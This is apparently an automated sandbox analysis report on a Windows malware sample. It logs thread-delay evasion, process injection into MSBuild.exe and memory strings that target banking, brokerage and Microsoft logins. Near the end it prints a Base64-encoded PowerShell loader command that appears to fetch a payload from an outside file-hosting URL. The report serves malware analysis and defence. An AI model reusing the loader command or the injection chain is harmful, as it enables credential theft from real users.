                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595983
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595732
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595183
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595077
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594747
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594087
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593869
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593733
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592454
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592106
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591889
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591562
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4147
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 4821
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 4988
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856 Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -25825441703193356s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536 Thread sleep count: 4821 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -599421s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536 Thread sleep count: 4988 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -599312s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -599203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -599093s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598872s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598765s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598656s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598546s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598437s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598317s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -598093s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597874s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597760s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597655s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597546s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597437s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597314s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -597199s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -596906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -596562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -596116s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595983s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595732s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595624s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595515s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595296s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595183s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -595077s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594968s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594856s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594747s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594640s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594530s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594421s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594312s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -594087s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -593984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -593869s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -593733s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -593531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -592776s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -592454s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -592328s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -592218s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -592106s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -591999s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -591889s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -591777s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -591671s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528 Thread sleep time: -591562s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598872
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598317
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597874
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 597199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 596116
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595983
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595732
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595183
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 595077
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594747
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 594087
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593869
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593733
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592454
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 592106
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591889
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591777
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 591562
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
                  Source: powershell.exe, 00000002.00000002.1458885432.000001F5E30B2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2551193762.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.00000000044A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: amsi64_6140.amsi.csv, type: OTHER
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1137008
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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 to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[system.text.encoding]::unicode.getstring([convert]::frombase64string('jabhagqaagbvahuacgbuag0azqbuahqaiaa9acaajwawac8abqbtafkawabsahkawabrac8azaavaguazqauaguadabzageacaavac8aogbzahaadab0aggajwa7acqacablag4adabhagqaaqbjacaapqagacqayqbkagoabwb1ahiabgbtaguabgb0acaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabmageacgbhagqaaqb6aguaiaa9acaajwboahqadabwahmaogavac8amwawadaanqauagyaaqbsaguabqbhagkabaauagmabwbtac8ayqbwagkalwbmagkabablac8azwblahqapwbmagkabablagsazqb5ad0abgbjahgaxwa1afqamabmahgasabpaeiaagbpagwatgbiadkaqwbsahyaaqbhagiauabqahiavwayagqababdac0atab4aguatwbkaeoauabgaf8awgbfadeatqbqadyaqwb1afeaqgbtaduaswbjahaadabbacyacabraf8adgbpagqapqazadqamga4adaamwbkadeaywbjadqazqazagiaoaawadeanwazadkamwa1adkamgawadmayga1agyazqa5agqajwa7acqazqbvagwaaqbhag4aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7acqaywbhahiabwb0agkaywagad0aiaakaguabwbsagkayqbuac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakagyayqbyageazabpahoazqapadsajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakagmayqbyag8adabpagmakqa7acqababhahuabgbkaguacgblahiaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakahmazqbtagkacaboahkababsagkazabpageabgagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajabjag8abgbmaguaywb0agkabwbuaguacgbzacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabsageadqbuagqazqbyaguacgapadsajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabzaguabqbpahaaaab5agwababpagqaaqbhag4akqa7acqaywbvag4azgblagmadabpag8abgblahiacwagac0azwblacaamaagac0ayqbuagqaiaakagyacgbhagmadabpag8abgbhahqaaqbuagcaiaatagcadaagacqaywbvag4azgblagmadabpag8abgblahiacwa7
